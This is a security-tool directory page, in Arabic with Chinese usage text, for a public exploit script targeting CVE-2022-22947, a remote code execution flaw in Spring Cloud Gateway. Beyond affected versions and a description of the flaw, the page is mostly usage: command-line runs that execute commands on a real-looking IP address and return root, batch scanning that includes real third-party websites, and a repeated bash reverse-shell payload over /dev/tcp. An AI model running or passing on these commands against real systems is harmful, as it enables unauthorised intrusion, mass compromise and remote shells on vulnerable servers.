Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22947_EXP — سكربت يمكن التحقق منه بشكل فردي أو جماعي (دفعة واحدة)، ويمكنه أيضًا إنشاء قشرة عكسية (reverse shell). | Kitploit
أدوات/GitHubGitHub/anansec/cve-2022-22947_exp
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubanansec/cve-2022-22947_exp

CVE-2022-22947_EXP

سكربت يمكن التحقق منه بشكل فردي أو جماعي (دفعة واحدة)، ويمكنه أيضًا إنشاء قشرة عكسية (reverse shell).

عرض المستودع
71منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

1. ثغرة تنفيذ التعليمات البرمجية عن بُعد في Spring Cloud Gateway

مستوى الخطورة: عالٍ

حالة POC/EXP: معلنة

رقم CNVD: CNNVD-2022-16402

رقم CVE: CVE-2022-22947

2. النطاق المتأثر:

    • VMWare Spring Cloud GateWay 3.1.0
    • VMWare Spring Cloud GateWay >=3.0.0، <=3.0.6
    • VMWare Spring Cloud GateWay <3.0.0

3. وصف الثغرة

توجد ثغرة تنفيذ تعليمات برمجية عن بُعد في Spring Cloud Gateway، وتحدث هذه الثغرة في نقطة نهاية Actuator في تطبيقات Spring Cloud Gateway، حيث تكون عرضة لهجمات حقن التعليمات البرمجية عندما تكون مفعّلة ومكشوفة وغير آمنة. يمكن للمهاجم استغلال هذه الثغرة لإنشاء طلبات ضارة تسمح بتنفيذ أي طلبات عن بُعد على المضيف البعيد.

4. استخدام EXP لـ CVE-2022-22947

(1) خصائص السكربت

  1. يدعم التحقق من هدف واحد
  2. يدعم التحقق الجماعي من الثغرات
  3. يدعم إرجاع الصدفة (Reverse Shell)

(2) معاملات السكربت

root@kitploit:~
-h   查看帮助信息
-u   指定url目标
-c   指定需要执行的命令,默认执行id
-f   指定目标url文件

(3) استخدام السكربت

1. التحقق من هدف واحد

الطريقة الأولى:

root@kitploit:~
E:\pocs>python cve-2022-22947.py

    验证单个目标:
            1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        验证多个目标
            1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
        反弹shell
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、进入交互模式,输入目标和反弹shell的命令

请输入一个目标url地址:http://123.58.236.76:8484
请输入想要执行的命令,默认执行id:whoami
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']

الطريقة الثانية:

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami

    验证单个目标:
            1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        验证多个目标
            1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
        反弹shell
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、进入交互模式,输入目标和反弹shell的命令

[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']

2. التحقق الجماعي

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt

    验证单个目标:
            1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        验证多个目标
            1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
        反弹shell
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、进入交互模式,输入目标和反弹shell的命令

[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[-]目标:http://www.baidu.com,漏洞验证失败,请手动验证!
[-]目标:http://www.qq.com,漏洞验证失败,请手动验证!
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']

3. إرجاع الصدفة (Reverse Shell)

root@kitploit:~
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"

image-20220519233354807

image-20220519233429912

تنزيل الأداة